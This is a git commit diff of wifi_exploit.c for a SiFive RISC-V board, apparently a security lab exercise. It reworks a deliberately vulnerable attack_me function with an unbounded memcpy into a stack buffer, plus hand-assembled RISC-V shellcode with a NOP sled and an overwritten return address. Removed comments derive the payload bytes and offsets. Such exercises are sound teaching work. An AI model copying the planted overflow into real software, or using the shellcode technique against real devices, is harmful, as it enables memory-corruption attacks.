working attack

2cb7e6b4 · fptk · 60880cec · 2cb7e6b4
Commit 2cb7e6b4 authored Feb 15, 2021 by fptk
--- a/sifive_software/src/wifi_exploit.c
+++ b/sifive_software/src/wifi_exploit.c
@@ -78,7 +78,7 @@ int is_target(char *test) {
 char *attack_me(char *data, uint32_t data_len) {
 	// nobody could possibly enter a name longer than 20 characters, so this buffer
 	// is definitely large enough
-	char message[28];
+	char message[128];
 	memset(message, 'B', sizeof(message));
 	memcpy(message, "Hallo, ", 7);
 	if(strncmp(data, get_target(), strlen(get_target())) == 0) {
@@ -86,7 +86,7 @@ char *attack_me(char *data, uint32_t data_len) {
 		snprintf(message + 13, 14 , " ist korrekt!");
 	}
 	else {
-		memcpy(message + 7, data, strlen(data) + 2);
+		memcpy(message + 7, data, data_len);
 	}
 	char *result = malloc(strlen(message) + 1);
@@ -114,63 +114,50 @@ int main(void) {
    spi_init(SPICLOCK_80KHZ);
-    //char *attack = "a12342234324452346234723482349234HAHA\x80\x12\x01\x20\xca\x13\x01\x20";
+    char *attack = "sBAUM";
-    													//buffer address
+    char *revattack = "a"
-/*
- * RISC SPEICHER:
+            "\x37\x05\x01\x20" // 0: lui a0,0x20010
- * MSB  LSB
+            "\x13\x05\xc5\x55" // 4: addi a0,a0,1372 # 0x2001055c
- * 6C6C6148 = 'Hall' | 6c =108 = l
+            "\x13\x0e\x00\x00" // 8: li t3,0
-http://csci206sp2020.courses.bucknell.edu/files/2020/01/riscv-card.pdf
+            "\x37\x1e\x01\x20" // c: lui t3,0x20011
-lsb		MSB
+            "\x13\x0e\xce\x45" // 10: addi t3,t3,1116 # 0x2001145c
-0 ...... 31
+            "\xe7\x0e\x0e\x00" // 14: jalr t4,t3
-Lui a5,0x80001
+            "\x13\x00\x00\x00" // 18: nop
-0110 1110 0001 1111 0011 1000 1000 0001
-HEX=\x6e\x1f\x38\x81
+    		"\x13\x00\x00\x00" // 20: nop
+            "\x13\x00\x00\x00" // 20: nop
+    		"\x13\x00\x00\x00"
-lw a5, -1375(a5) //1 less than in orig bin, otherwise 0 byte in payload
+    		"\x13\x00\x00\x00"
-opcode   rd    f3  rs1    immediate
+    		"\x13\x00\x00\x00"
-00000011 01110 010 01110  101010100001
+    		"\x13\x00\x00\x00"
-0000 0110 1110 0100 1110 1010 1010 0001
+    		"\x13\x00\x00\x00"
-HEX=\x06\xe4\xea\xa1
+    		"\x13\x00\x00\x00"
+    		"\x13\x00\x00\x00"
+    		"\x13\x00\x00\x00"
-addi a0, 15, 1
+    		"\x13\x00\x00\x00"
-opcode  rd    f3  rs1   immediate
+    		"\x13\x00\x00\x00"
-0010011 01010 000 01110 000000000001
+    		"\x13\x00\x00\x00"
-0010 0110 1010 0000 1110 0000 0000 0001
+    		"\x13\x00\x00\x00"
-HEX=\x26\xa0\xe0\x01
+    		"\x13\x00\x00\x00"
+    		"\x13\x00\x00\x00"
+    		"\x13\x00\x00\x00"
-jal 0 offset
+    		"\x13\x00\x00\x00"
-jal 0 0x200113ca
+    		"\x13\x00\x00\x00"
-1101111 00000 100000000000010001001111001010
+    		"\x13\x00\x00\x00"
-1101 1110 0000 0001 0001 0011 1100 1010 
+    		"\x13\x00\x00\x00"
-HEX=\xde\x01\x13\xca
+    		"\x13\x00\x00\x00"
+    		"\x13\x00\x00\x00"
--> the assembly dump is:
+            "\x13\x00\x00\x00"
-lui a5, 0x80001
+    		"\x13\x00\x00\x00"
-lw a5, -1376(a5)
+    		"\x13\x00\x00\x00"
-addi a0,15,0 == mv a0,a5
-jal 0 offset
+    		"\xe4\x0e\x00\x80"
-which results in hexdump:
+    		"\xe4\x0e\x00\x80";
-\x6e\x1f\x38\x81\x06\xe4\xea\xa1\x26\xa0\xe0\x01\xde\x01\x13\xca
+    char *result = attack_me(revattack, 141);
-that is 4 instructions each 4 bytes.
+    //char *result = attack_me(attack, 120);
-The buffer has 28 Bytes
+    printf("result: %s", result);
-The return address to overwrite lies at buffer+44 Bytes.
-44-16-7=21 Bytes of garbage (-7 for "Hallo, ")
-the new return address:
-\x38\x0f\x00\x80
-*/
-    char *attack = "a0aaa1aaa2aaa3aaa\x6e\x1f\x38\x81\x06\xe4\xea\xa1\x26\xa0\xe0\x01\xde\x01\x13\xca\x12\x23\x34\x45\x50\x0f\x00\x80";
-    char *revattack = "a0aaa1aaa2aaa3aaa\x81\x38\x1f\x6e\xa1\xea\xe4\x06\x01\xe0\xa0\x26\xca\x13\x01\xde\x45\x34\x23\x12\x58\x0f\x00\x80";
-    char *result = attack_me(revattack, 26);
-    printf("%s", result);
    /*
    if(webserver_init(ESP32_NETWORK_IMPLEMENTATION) != 0) {